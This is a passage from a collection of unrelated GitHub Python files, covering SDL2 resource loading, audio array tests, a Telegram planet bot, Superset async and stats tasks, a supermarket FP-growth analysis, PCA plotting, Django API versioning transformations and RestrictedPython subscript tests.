``targz``. Defaults to\n ``zip`` if not specified.\n\n Raises:\n ValueError: If the file does not exist at the provided path, or if\n the file is not a supported archive type.\n\n \"\"\"\n if not os.path.exists(filename):\n raise ValueError(\"invalid file path\")\n fname = os.path.basename(filename)\n if 'zip' in fname.split('.'):\n self._scanzip(filename)\n elif 'tar' in fname.split('.'):\n self._scantar(filename)\n else:\n if typehint == 'zip':\n self._scanzip(filename)\n elif typehint == 'tar':\n self._scantar(filename)\n elif typehint == 'tarbz2':\n self._scantar(filename, 'bz2')\n elif typehint == 'targz':\n self._scantar(filename, 'gz')\n else:\n raise ValueError(\"unsupported archive type\")\n\n def get(self, filename):\n \"\"\"Retrieves a resource file by name from the container.\n\n Args:\n filename (str): The file name of the resource to retrieve.\n\n Returns:\n :obj:`~io.BytesIO`: A Python bytestream object containing the\n retrieved resource file.\n\n Raises:\n KeyError: If the given file could not be found.\n\n \"\"\"\n archive, ftype, pathname = self.files[filename]\n if archive:\n if ftype == 'zip':\n return open_zipfile(archive, pathname)\n elif ftype == 'tar':\n return open_tarfile(archive, pathname)\n elif ftype == 'tarbz2':\n return open_tarfile(archive, pathname, ftype='bz2')\n elif ftype == 'targz':\n return open_tarfile(archive, pathname, ftype='gz')\n else:\n raise ValueError(\"unsupported archive type\")\n dmpdata = open(pathname, 'rb')\n data = io.BytesIO(dmpdata.read())\n dmpdata.close()\n return data\n\n def get_filelike(self, filename):\n # Deprecated, doesn't make much difference in Python 3\n archive, ftype, pathname = self.files[filename]\n if archive:\n if ftype == 'zip':\n return open_zipfile(archive, pathname)\n elif ftype == 'tar':\n return open_tarfile(archive, pathname)\n elif ftype == 'tarbz2':\n return open_tarfile(archive, pathname, ftype='bz2')\n elif ftype == 'targz':\n return open_tarfile(archive, pathname, ftype='gz')\n else:\n raise ValueError(\"unsupported archive type\")\n return open(pathname, 'rb')\n\n def get_path(self, filename):\n \"\"\"Gets the path of a given resource file.\n\n If the file is only available within an archive, a string in the form\n ``filename@archivename`` will be returned.\n\n Args:\n filename (str): The file name of the resource to locate.\n\n Returns:\n str: The absolute path of the resource file, or the archive\n identifier string if the resource is inside an archive.\n\n Raises:\n KeyError: If the given file could not be found.\n\n \"\"\"\n archive, ftype, pathname = self.files[filename]\n if archive:\n return '%s@%s' % (pathname, archive)\n return pathname\n\n def scan(self, path, subdir=None, excludepattern=None):\n \"\"\"Scans a path, adding all matching files to the container.\n\n If a located file is a ``.zip`` or ``.tar`` archive, its\n contents will be indexed and added to the container automatically.\n\n Args:\n path (str): The path of the directory to scan.\n subdir (str, optional): Deprecated, do not use.\n excludepattern (str, optional): A regular expression indicating\n which directories (if any) within the file structure of the\n given path to exclude from indexing. Defaults to ``None``. \n\n Raises:\n ValueError: If the specified path does not exist.\n\n \"\"\"\n match = None\n if excludepattern:\n match = re.compile(excludepattern).match\n join = os.path.join\n add = self.add\n abspath = os.path.abspath(path)\n if not os.path.exists(abspath):\n raise ValueError(\"invalid path '%s'\" % abspath)\n if not os.path.isdir(abspath):\n abspath = os.path.dirname(abspath)\n if subdir is not None:\n abspath = os.path.join(abspath, subdir)\n if not os.path.exists(abspath):\n raise ValueError(\"invalid path '%s'\" % abspath)\n for (pdir, dirnames, filenames) in os.walk(abspath):\n if match and match(pdir) is not None:\n continue\n for fname in filenames:\n add(join(pdir, fname))\n","repo_name":"juso40/bl2sdk_Mods","sub_path":"blimgui/dist/sdl2/ext/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":13976,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"} +{"seq_id":"32346428387","text":"import pytest\n\nimport numpy as np\n\nimport pylibrb\nfrom pylibrb import create_audio_array, reorder_to_rb, reorder_from_rb\n\n\ndef test_create_audio_array_should_create_array_with_correct_shape():\n audio = create_audio_array(2, 128)\n\n assert audio.shape[pylibrb.CHANNELS_AXIS] == 2\n assert audio.shape[pylibrb.SAMPLES_AXIS] == 128\n\n\ndef test_create_audio_array_should_create_array_with_correct_value():\n audio = create_audio_array(2, 128, 321)\n\n assert np.all(audio == 321)\n\n\ndef test_reorder_to_rb_should_raise_index_error_when_bad_samples_axis():\n audio = create_audio_array(2, 128)\n\n with pytest.raises(IndexError):\n reorder_to_rb(audio, samples_axis=2)\n\n\ndef test_reorder_to_rb_should_do_nothing_when_audio_with_correct_layout():\n audio = create_audio_array(2, 128)\n\n audio_reordered = reorder_to_rb(audio, samples_axis=pylibrb.SAMPLES_AXIS)\n\n assert audio_reordered.shape == audio.shape\n\n\ndef test_reorder_to_rb_should_reorder_audio_array_when_audio_with_wrong_layout():\n audio = create_audio_array(2, 128)\n\n # pass transposed audio array and thus also transposed samples axis (i.e. channels axis)\n audio_reordered = reorder_to_rb(audio.T, samples_axis=pylibrb.CHANNELS_AXIS)\n\n assert audio_reordered.shape == audio.shape\n\n\ndef test_reorder_to_rb_should_reorder_audio_array_when_audio_with_wrong_complex_layout():\n audio = create_audio_array(1, 2 * 4 * 8 * 4).reshape(2, 4, 8, 4)\n\n audio_reordered = reorder_to_rb(audio, samples_axis=2) # select 3rd axis of shape 8\n\n expected_shape = [8, 8]\n expected_shape[pylibrb.CHANNELS_AXIS] = 2 * 4 * 1 * 4\n assert audio_reordered.shape == tuple(expected_shape)\n\n\ndef test_reorder_from_rb_should_raise_value_error_when_missing_None_in_wanted_shape():\n audio = create_audio_array(2, 128)\n\n with pytest.raises(ValueError):\n reorder_from_rb(audio, wanted_shape=(2, 128))\n\n\ndef test_reorder_from_rb_should_do_nothing_when_audio_with_correct_layout():\n rb_audio = create_audio_array(2, 128)\n\n wanted_shape = [-1, -1]\n wanted_shape[pylibrb.SAMPLES_AXIS] = None\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=wanted_shape)\n\n assert audio_reordered.shape == rb_audio.shape\n\n\ndef test_reorder_from_rb_should_reorder_audio_array_when_audio_with_wrong_layout():\n rb_audio = create_audio_array(2, 128)\n\n # pass samples axis as channels axis\n wanted_shape = [2, 2]\n wanted_shape[pylibrb.CHANNELS_AXIS] = None\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=wanted_shape)\n\n assert audio_reordered.shape == rb_audio.T.shape\n\n\ndef test_reorder_from_rb_should_reorder_audio_array_when_audio_with_wrong_complex_layout():\n audio = create_audio_array(24, 128).reshape(1, 2, 128, 3, 4)\n audio[0, 0, :, 0, 0] = np.arange(128)\n audio[-1, -1, :, -1, -1] = np.arange(128, 2 * 128)\n\n rb_audio = reorder_to_rb(audio, samples_axis=2)\n audio_reordered = reorder_from_rb(rb_audio, wanted_shape=[1, 2, None, 3, 4])\n\n assert audio_reordered.shape == audio.shape\n assert np.array_equal(audio[0, 0, :, 0, 0], np.arange(128))\n assert np.array_equal(audio[-1, -1, :, -1, -1], np.arange(128, 2 * 128))\n","repo_name":"pawel-glomski/pylibrb","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35060089756","text":"import sys\n\nfo = open(\"answer2.txt\",\"r\")\nfinq = open(\"finalanswer.txt\",\"a\")\nlines=fo.read().split(\"\\n\")\nif lines[0]==\"UNSAT\":\n\tfinq.write(\"UNSAT\\n\")\n\tsys.exit()\ndel lines[0]\ndel lines[-1]\nlines=lines[0].split(\" \")\ndel lines[-1]\nfor i in lines:\n\tif i[0]!= '-':\n\t\tif int(i)%9!=0:\n\t\t\tfinq.write(str(int(i)%9))\n\t\telse : finq.write(\"9\")\nfinq.write(\"\\n\")\n","repo_name":"dragoste17/course-projects","sub_path":"Sudoku Solver/Problem2/q2helper.py","file_name":"q2helper.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19987637710","text":"import logging\nimport sys\nimport RPCClient\nimport json\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nM = RPCClient.RPCClient()\nid = sys.argv[1]\ntime.sleep(1) # Allow subscribers to connect\nM.when_set_filter(\"CLAIM[global/papers]\")\n\nwhile True:\n string = M.when_recv()\n msg_prefix = string.split(']', 1)[0] + \"]\"\n papers = json.loads(string[len(msg_prefix):])\n ill = M.new_illumination(\"global\")\n ill.fill(0, 255, 0, 99)\n for paper in papers:\n if len(paper[\"corners\"]) == 4:\n tri1 = []\n tri2 = []\n for corner in paper[\"corners\"]:\n if corner[\"CornerId\"] in [0,1,2]:\n tri1.append(corner)\n if corner[\"CornerId\"] in [2,3,0]:\n tri2.append(corner)\n ill.polygon(list(map(lambda c: (c[\"x\"], c[\"y\"]), tri1)))\n ill.polygon(list(map(lambda c: (c[\"x\"], c[\"y\"]), tri2)))\n M.wish(\"DRAW\", id, ill.package())\n","repo_name":"jhaip/wysiwyog","sub_path":"programs/show-papers--1924.py","file_name":"show-papers--1924.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19597700689","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport logging\nfrom datetime import datetime\nimport ephem\nimport os\n\n\ndef get_now():\n return datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\ndef get_current_date():\n return datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\nlog_dir_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logs')\nos.makedirs(log_dir_path, exist_ok=True)\nlogging.basicConfig(format='%(name)s - %(levelname)s - %(message)s',\n level=logging.INFO,\n filename=f\"logs/bot_{datetime.now().strftime('%Y%m%d_%H%M%S')}.log\"\n )\n\nPROXY = {'proxy_url': 'socks5://t1.learn.python.ru:1080',\n 'urllib3_proxy_kwargs': {'username': 'learn', 'password': 'python'}}\n\n\ndef greet_user(bot, update):\n text = 'Вызван /start'\n print(text)\n update.message.reply_text(text)\n\n\ndef talk_to_me(bot, update):\n user_text = update.message.text\n print(user_text)\n update.message.reply_text(user_text)\n\n\ndef planet_detector(bot, update):\n try:\n _planet_candidate = update.message.text.split('planet')[1].strip()\n planet_name = getattr(ephem, _planet_candidate)(datetime.today())\n constellation = ephem.constellation(planet_name)\n update.message.reply_text(f'Planet: {planet_name.name} in constellation: {constellation[1]}')\n except Exception as err:\n print(f'{get_now()} Error {err}')\n x = [name for id, type, name in ephem._libastro.builtin_planets() if type == 'Planet' and name not in ('Sun', 'Moon')]\n all_planet_list = '\\n/planet '.join(x)\n update.message.reply_text(f'Choose one of this planet:\\n/planet {all_planet_list}')\n\n\ndef main():\n mybot = Updater('API_KEY', request_kwargs=PROXY)\n\n dp = mybot.dispatcher\n dp.add_handler(CommandHandler(\"start\", greet_user))\n dp.add_handler(CommandHandler(\"planet\", planet_detector))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n mybot.start_polling()\n mybot.idle()\n\n\nmain()\n","repo_name":"xtreezzz/msp_lesson2","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5291721172","text":"from flask import Blueprint, jsonify\nfrom db import get_db\nfrom pymysql.cursors import DictCursor\n\nfrom wikispeedruns import stats\nfrom util.decorators import check_admin\nfrom util.lock_utils import locked\nfrom util.process_utils import start_process_with_db\n\nstats_api = Blueprint(\"stats\", __name__, url_prefix=\"/api/stats\")\n\ndef _calc_stats(lock):\n with lock:\n stats.calculate()\n\n@stats_api.get(\"/calculate\")\n@check_admin\ndef calculate_stats():\n if locked(stats.calc_stat_lock):\n return 'Stat calculation in progress, check back later.', 503\n\n start_process_with_db(_calc_stats, (stats.calc_stat_lock,))\n return 'Success', 200\n\n@stats_api.get(\"/all\")\n@check_admin\ndef get_total_stats():\n # see https://stackoverflow.com/a/67266529/5613935 for some issues with doing this other ways\n most_recent_stats_query = \"\"\"\n SELECT \n stats_json, \n DATE_FORMAT(timestamp, '%Y-%m-%dT%TZ') AS timestamp\n FROM `computed_stats`\n WHERE timestamp IN (SELECT MAX(timestamp) FROM `computed_stats`);\n \"\"\"\n\n db = get_db()\n with db.cursor(cursor=DictCursor) as cursor:\n cursor.execute(most_recent_stats_query)\n return jsonify(cursor.fetchall()[0])\n","repo_name":"wikispeedruns/wikipedia-speedruns","sub_path":"apis/stats_api.py","file_name":"stats_api.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"61"} +{"seq_id":"29874988260","text":"\"\"\"\nMain module for Analysis of input files for Supermarket analysis Data Science Project\n\"\"\"\n\n\nimport time\nimport json\nfrom pprint import pprint\nfrom fpgrowth_py.fpgrowth import fpgrowthFromFile\n\nimport os\nimport sys\nimport traceback\nfrom os import mkdir\nfrom os.path import isdir\nfrom shutil import rmtree\nfrom multiprocessing import Process\nfrom utils.Reader import Reader\nfrom utils.Writer import Writer\n\n\ndef prep_part_1():\n def recreate_folders(path):\n if isdir(path):\n rmtree(path)\n mkdir(path)\n\n recreate_folders(\"resources/customers\")\n recreate_folders(\"resources/fpgrowth_checkpoint\")\n recreate_folders(\"resources/products_checkpoint\")\n\ndef prep_part_2():\n\n def elim_file(path):\n if os.path.isfile(path):\n os.remove(path)\n\n elim_file('resources/customers_final.json')\n elim_file('resources/products_final.json')\n elim_file('resources/fpgrowth_final.csv')\n\ndef do_etl_part_1():\n\n PRODUTOS = \"resources/Products.txt\"\n RECPT_TMPLT = \"resources/receipts/\"\n EXPLN_TMPLT = \"resources/explanations/\"\n NUMFOLDERS = 50\n\n try:\n # TODO : COMMENT IF USING CHECKPOINT\n # prep_part_1()\n products_df = Reader.read_produtos(PRODUTOS)\n processes = []\n\n for i in range(NUMFOLDERS):\n args = (\n RECPT_TMPLT,\n EXPLN_TMPLT,\n products_df,\n i,\n )\n p = Process(target=Reader.read_receipts, args=args)\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n\n # partial_receipts = partial(Reader.read_receipts, RECPT_TMPLT, EXPLN_TMPLT, products_df)\n # with ProcessPoolExecutor() as executor:\n # executor.map(partial_receipts, NUMFOLDERSP)\n\n # for i in range(NUMFOLDERS):\n # Reader.read_receipts(RECPT_TMPLT, EXPLN_TMPLT, products_df, i)\n\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef do_etl_part_2():\n\n PRODUTOS = \"resources/Products.txt\"\n NUMFOLDERS = 50\n\n try:\n prep_part_2()\n products_df = Reader.read_produtos(PRODUTOS)\n Reader.combine_checkpoints(NUMFOLDERS, products_df)\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef last_pass():\n\n CUSTOMERS_PATH = \"resources/customers_final.json\"\n PRODUCTS_PATH = \"resources/products_final.json\"\n\n try:\n Reader.analyze_finals(CUSTOMERS_PATH, PRODUCTS_PATH)\n except Exception:\n traceback.print_exception(*sys.exc_info())\n\ndef do_fpgrowth():\n\n FPGROWTH_PATH = \"resources/fpgrowth_final.csv\"\n print('Timing fpgrowth\\n')\n\n # Results give first the itemset and then the rules\n\n s1 = time.time()\n results = fpgrowthFromFile(FPGROWTH_PATH, 0.5, 0)\n f1 = time.time()\n\n freqset = results[0]\n rules = results[1]\n\n print(f'Time -- 0.5 CONF -- {f1-s1}')\n pprint(freqset)\n pprint(rules)\n\n print('---------------------------')\n\n s2 = time.time()\n results2 = fpgrowthFromFile(FPGROWTH_PATH, 0.1, 0)\n f2 = time.time()\n\n freqset2 = results2[0]\n rules2 = results2[1]\n\n print(f'Time -- 0.1 CONF -- {f2-s2}')\n pprint(freqset2)\n pprint(rules2)\n\n print('---------------------------')\n\n s3 = time.time()\n results3 = fpgrowthFromFile(FPGROWTH_PATH, 0.05, 0)\n f3 = time.time()\n\n freqset3 = results3[0]\n rules3 = results3[1]\n\n print(f'Time -- 0.05 CONF -- {f3-s3}')\n pprint(freqset3)\n pprint(rules3)\n\n print('---------------------------')\n\n s4 = time.time()\n results4 = fpgrowthFromFile(FPGROWTH_PATH, 0.05, 0)\n f4 = time.time()\n\n freqset4 = results4[0]\n rules4 = results4[1]\n\n print(f'Time -- 0.01 CONF -- {f4-s4}')\n pprint(freqset4)\n pprint(rules4)\n\n print('---------------------------')\n\ndef main2():\n\n # Testing stuff\n\n PRODUTOS = \"resources/Products.txt\"\n products_final = \"resources/products_final.json\"\n products_df = Reader.read_produtos(PRODUTOS)\n\n # Número total de prateleiras para cada produto\n available = products_df['Total Prateleiras'].values\n assoc_dict = dict([(p,c+1) for (c,p) in enumerate(products_df.index)])\n\n ordered_profit = []\n\n def snd(tuple):\n return tuple[1]\n\n with open(products_final, 'r') as fin:\n prod_dict = json.load(fin)\n\n # lst = [(v['Name'], v['Profit']) for _,v in prod_dict.items()]\n lst = [(v['Name'], v['Sold']) for _,v in prod_dict.items()]\n slst = sorted(lst, key=snd, reverse=True)\n\n # Most sold first from the back\n for i,v in enumerate(slst):\n ordered_profit.append(assoc_dict[v[0]])\n\n sol = []\n i = 0\n\n while len(sol) < 248:\n\n product_code = ordered_profit[i]\n\n if available[product_code - 1] > 0:\n sol.append(product_code)\n available[product_code - 1] += (-1)\n\n i += 1\n if i == len(ordered_profit):\n i = 0\n\n pprint(ordered_profit)\n pprint(sol)\n\n sol.reverse()\n\n Writer.dump_data_csv_single('sales_conf.csv', sol)\n # Writer.dump_data_csv_single('profit_conf.csv', sol)\n\n\nif __name__ == \"__main__\":\n print(\"Which python interpreter is executing the file?\")\n print(sys.executable)\n\n # CORRECT ORDER OF EXECUTION\n\n # Segment the data in receipts and explanations\n # do_etl_part_1()\n\n # Recombine checkpoints and generate final files\n # do_etl_part_2()\n\n # Extract rules and itemsets\n # do_fpgrowth()\n\n # Analyze final customers, products and fpgrowth\n # last_pass()\n\n # Testing\n main2()\n","repo_name":"Dayveed117/thebest-supermarket","sub_path":"src/run_analysis.py","file_name":"run_analysis.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12995020369","text":"#%% IMPORTING PACKAGES\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#%%\n\ndef pontos_3d(P):\n np.random.seed(31)\n X = [2 * np.random.random_sample(P) - 1,\n 2 * np.random.random_sample(P) - 1,\n 2 * np.random.random_sample(P) - 1]\n X = np.array(X)\n Xp = []\n t1, t2, t3 = 0.5, 0.5, -0.9\n R1 = [[1, 0, 0], [0, np.cos(t1), -np.sin(t1)], [0, np.sin(t1), np.cos(t1)]]\n R2 = [[np.cos(t2), 0, np.sin(t2)], [0, 1, 0], [-np.sin(t2), 0, np.cos(t2)]]\n R3 = [[np.cos(t3), -np.sin(t3), 0], [np.sin(t3), np.cos(t3), 0], [0, 0, 1]]\n R = np.dot(np.dot(R1, R2), R3) \n for i in range(P):\n if ((X[0][i]**2)/0.85 + (X[1][i]**2)/0.41 + (X[2][i]**2)/0.626 - 1) < 0:\n Xp.append(np.dot(R, X[:,i]))\n return np.array(Xp)\n\n\ndef centraliza(X):\n P = len(X)\n s = X.shape[1]\n for i in range(P):\n s = s + X[i,:]\n X_mean = s / P\n X_centered = X - X_mean\n return X_centered\n\n\ndef PCA(X):\n P = len(X[0,:])\n Cov = 1/P * np.dot(X,X.T)\n D,V = np.linalg.eigh(Cov)\n return D,V\n\n\n#%%\n\nP = 70000\nX = pontos_3d(P)\nX = centraliza(X)\n[D,V] = PCA(X.T)\n\nfig = plt.figure(figsize = (12, 10))\nplt.xlim(-1,1)\nplt.ylim(-1,1)\n\nax = plt.axes(projection='3d')\n\n# Reproduz os pontos de P\nax.scatter(X[:,0], X[:,1], X[:,2], s=1)\n\n# Cores do gráfico\ncolors = ['red', 'green', 'orange']\n\nfor i in range(len(D)):\n x = [0, 2*np.sqrt(D[i])*V[i][0]]\n y = [0, 2*np.sqrt(D[i])*V[i][1]]\n z = [0, 2*np.sqrt(D[i])*V[i][2]]\n ax.plot(x, y, z, colors[i], linewidth=8)\n\nplt.show()","repo_name":"jpkcunha/MAT1330","sub_path":"Listas/Lista3/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25167829895","text":"from __future__ import annotations\n\nimport copy\nimport logging\nfrom typing import Any, cast, TYPE_CHECKING\n\nfrom celery.exceptions import SoftTimeLimitExceeded\nfrom flask import current_app, g\nfrom marshmallow import ValidationError\n\nfrom superset.charts.schemas import ChartDataQueryContextSchema\nfrom superset.exceptions import SupersetVizException\nfrom superset.extensions import (\n async_query_manager,\n cache_manager,\n celery_app,\n security_manager,\n)\nfrom superset.utils.cache import generate_cache_key, set_and_log_cache\nfrom superset.utils.core import override_user\nfrom superset.views.utils import get_datasource_info, get_viz\n\nif TYPE_CHECKING:\n from superset.common.query_context import QueryContext\n\nlogger = logging.getLogger(__name__)\nquery_timeout = current_app.config[\n \"SQLLAB_ASYNC_TIME_LIMIT_SEC\"\n] # TODO: new config key\n\n\ndef set_form_data(form_data: dict[str, Any]) -> None:\n g.form_data = form_data\n\n\ndef _create_query_context_from_form(form_data: dict[str, Any]) -> QueryContext:\n try:\n return ChartDataQueryContextSchema().load(form_data)\n except KeyError as ex:\n raise ValidationError(\"Request is incorrect\") from ex\n except ValidationError as error:\n raise error\n\n\n@celery_app.task(name=\"load_chart_data_into_cache\", soft_time_limit=query_timeout)\ndef load_chart_data_into_cache(\n job_metadata: dict[str, Any],\n form_data: dict[str, Any],\n) -> None:\n # pylint: disable=import-outside-toplevel\n from superset.commands.chart.data.get_data_command import ChartDataCommand\n\n user = (\n security_manager.get_user_by_id(job_metadata.get(\"user_id\"))\n or security_manager.get_anonymous_user()\n )\n\n with override_user(user, force=False):\n try:\n set_form_data(form_data)\n query_context = _create_query_context_from_form(form_data)\n command = ChartDataCommand(query_context)\n result = command.run(cache=True)\n cache_key = result[\"cache_key\"]\n result_url = f\"/api/v1/chart/data/{cache_key}\"\n async_query_manager.update_job(\n job_metadata,\n async_query_manager.STATUS_DONE,\n result_url=result_url,\n )\n except SoftTimeLimitExceeded as ex:\n logger.warning(\"A timeout occurred while loading chart data, error: %s\", ex)\n raise ex\n except Exception as ex:\n # TODO: QueryContext should support SIP-40 style errors\n error = str(ex.message if hasattr(ex, \"message\") else ex)\n errors = [{\"message\": error}]\n async_query_manager.update_job(\n job_metadata, async_query_manager.STATUS_ERROR, errors=errors\n )\n raise ex\n\n\n@celery_app.task(name=\"load_explore_json_into_cache\", soft_time_limit=query_timeout)\ndef load_explore_json_into_cache( # pylint: disable=too-many-locals\n job_metadata: dict[str, Any],\n form_data: dict[str, Any],\n response_type: str | None = None,\n force: bool = False,\n) -> None:\n cache_key_prefix = \"ejr-\" # ejr: explore_json request\n\n user = (\n security_manager.get_user_by_id(job_metadata.get(\"user_id\"))\n or security_manager.get_anonymous_user()\n )\n\n with override_user(user, force=False):\n try:\n set_form_data(form_data)\n datasource_id, datasource_type = get_datasource_info(None, None, form_data)\n\n # Perform a deep copy here so that below we can cache the original\n # value of the form_data object. This is necessary since the viz\n # objects modify the form_data object. If the modified version were\n # to be cached here, it will lead to a cache miss when clients\n # attempt to retrieve the value of the completed async query.\n original_form_data = copy.deepcopy(form_data)\n\n viz_obj = get_viz(\n datasource_type=cast(str, datasource_type),\n datasource_id=datasource_id,\n form_data=form_data,\n force=force,\n )\n # run query & cache results\n payload = viz_obj.get_payload()\n if viz_obj.has_error(payload):\n raise SupersetVizException(errors=payload[\"errors\"])\n\n # Cache the original form_data value for async retrieval\n cache_value = {\n \"form_data\": original_form_data,\n \"response_type\": response_type,\n }\n cache_key = generate_cache_key(cache_value, cache_key_prefix)\n set_and_log_cache(cache_manager.cache, cache_key, cache_value)\n result_url = f\"/superset/explore_json/data/{cache_key}\"\n async_query_manager.update_job(\n job_metadata,\n async_query_manager.STATUS_DONE,\n result_url=result_url,\n )\n except SoftTimeLimitExceeded as ex:\n logger.warning(\n \"A timeout occurred while loading explore json, error: %s\", ex\n )\n raise ex\n except Exception as ex:\n if isinstance(ex, SupersetVizException):\n errors = ex.errors\n else:\n error = ex.message if hasattr(ex, \"message\") else str(ex)\n errors = [error]\n\n async_query_manager.update_job(\n job_metadata, async_query_manager.STATUS_ERROR, errors=errors\n )\n raise ex\n","repo_name":"apache/superset","sub_path":"superset/tasks/async_queries.py","file_name":"async_queries.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"1024899658","text":"from functools import total_ordering\n\nfrom django.utils.functional import cached_property\nfrom rest_framework.fields import set_value\nfrom rest_framework.serializers import Field, Serializer\n\nfrom .utils import get_version_index\n\n\n@total_ordering\nclass Transformation:\n \"\"\"An implied migration between versions.\n\n Transformations are sorted (and therefore applied) in the following order:\n * Same version\n * Fields first\n * Serializers second\n * Newer version\n * ...\n\n Attributes:\n bases: Fully qualified class names of serializers, fields or serializer's fielsd.\n version: The version transformed to.\n\n .. note::\n ``bases`` can apply to either:\n * Serializers: ``myapp.serializers.MySerializer``.\n * Fields: ``myapp.fields.MyField``.\n * Serializer specific fields: ``myapp.serializers.MySerializer.field``\n \"\"\"\n\n bases = []\n version = None\n\n def __init__(self, base, field=None):\n self.base = base\n self.field = field\n\n def __str__(self):\n return '{base}{field} {version}'.format(\n base=self.base.__class__.__name__,\n field='.{}'.format(self.field) if self.field else '',\n version=self.version\n )\n\n def __repr__(self):\n return '<{cls}: {str}>'.format(\n cls=self.__class__.__name__,\n str=self.__str__()\n )\n\n def __eq__(self, other):\n return self.is_same_version(other.version_index) \\\n and self.field == other.field \\\n and self.base.__class__ == other.base.__class__\n\n def __lt__(self, other):\n if not self.is_same_version(other.version_index):\n return self.is_older_version(other.version_index)\n elif self.for_field:\n return False\n return self.for_specific_field and other.for_serializer\n\n @property\n def for_field(self):\n \"\"\"Whether this transformation applies to a ``Field``.\n\n .. note::\n A ``Serializer`` inherits from ``Field``. What is meant with field\n here is a class that inherits from ``Field`` but does not inherit\n from ``Serializer``.\n\n Returns:\n True if the base is a ``Field`` subclass and no ``Serializer`` subclass.\n bool\n \"\"\"\n return issubclass(self.base.__class__, Field) and not issubclass(self.base.__class__, Serializer)\n\n @property\n def for_specific_field(self):\n \"\"\"Whether this transformation applies to a serializer's field.\n\n Returns:\n True if the base is a ``Serializer`` subclass and a specific field is set.\n bool\n \"\"\"\n return self.field is not None and issubclass(self.base.__class__, Serializer)\n\n @property\n def for_serializer(self):\n \"\"\"Whether this transforation applies to a field.\n\n Returns:\n True if the base is a ``Serializer`` and no specific field is set.\n bool\n \"\"\"\n return self.field is None and issubclass(self.base.__class__, Serializer)\n\n @cached_property\n def version_index(self):\n return get_version_index(self.version)\n\n def is_newer_version(self, version_index):\n return self.version_index > version_index\n\n def is_older_version(self, version_index):\n return self.version_index < version_index\n\n def is_same_version(self, version_index):\n return self.version_index == version_index\n\n def transform(self, data, request, obj, forwards):\n method_prefix = 'forwards_' if forwards else 'backwards_'\n kwargs = {\n 'data': data,\n 'request': request\n }\n if not forwards:\n kwargs['obj'] = obj\n if self.for_field:\n return getattr(self, method_prefix + 'field')(\n **kwargs\n )\n elif self.for_serializer:\n return getattr(self, method_prefix + 'serializer')(\n **kwargs\n )\n else:\n if forwards:\n value = self.field.get_value(data)\n else:\n value = self.field.get_attribute(obj)\n kwargs['data'] = data[self.field]\n transformed_value = getattr(self, method_prefix + 'specific_field')(\n obj=obj,\n data=value,\n request=request\n )\n if forwards:\n set_value(data, self.field.source_attrs, value)\n else:\n data[self.field.field_name] = transformed_value\n return data\n\n def backwards_serializer(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def backwards_field(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def backwards_specific_field(self, data, obj, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the backwards methods.'\n )\n\n def forwards_serializer(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n\n def forwards_field(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n\n def forwards_specific_field(self, data, request):\n raise NotImplementedError(\n 'Transformation subclasses need to implement the forwards methods.'\n )\n","repo_name":"ssprasad100/Lunchbreak_backend_again","sub_path":"lunchbreak/versioning_prime/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4634137288","text":"from tests.helper import restricted_exec\n\n\nSIMPLE_SUBSCRIPTS = \"\"\"\ndef simple_subscript(a):\n return a['b']\n\"\"\"\n\n\ndef test_read_simple_subscript(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SIMPLE_SUBSCRIPTS, glb)\n\n assert (value, 'b') == glb['simple_subscript'](value)\n\n\nVAR_SUBSCRIPT = \"\"\"\ndef simple_subscript(a, b):\n return a[b]\n\"\"\"\n\n\ndef test_read_subscript_with_variable(mocker):\n value = [1]\n idx = 0\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(VAR_SUBSCRIPT, glb)\n\n assert (value, 0) == glb['simple_subscript'](value, idx)\n\n\nTUPLE_SUBSCRIPTS = \"\"\"\ndef tuple_subscript(a):\n return a[1, 2]\n\"\"\"\n\n\ndef test_tuple_subscript(mocker):\n value = None\n 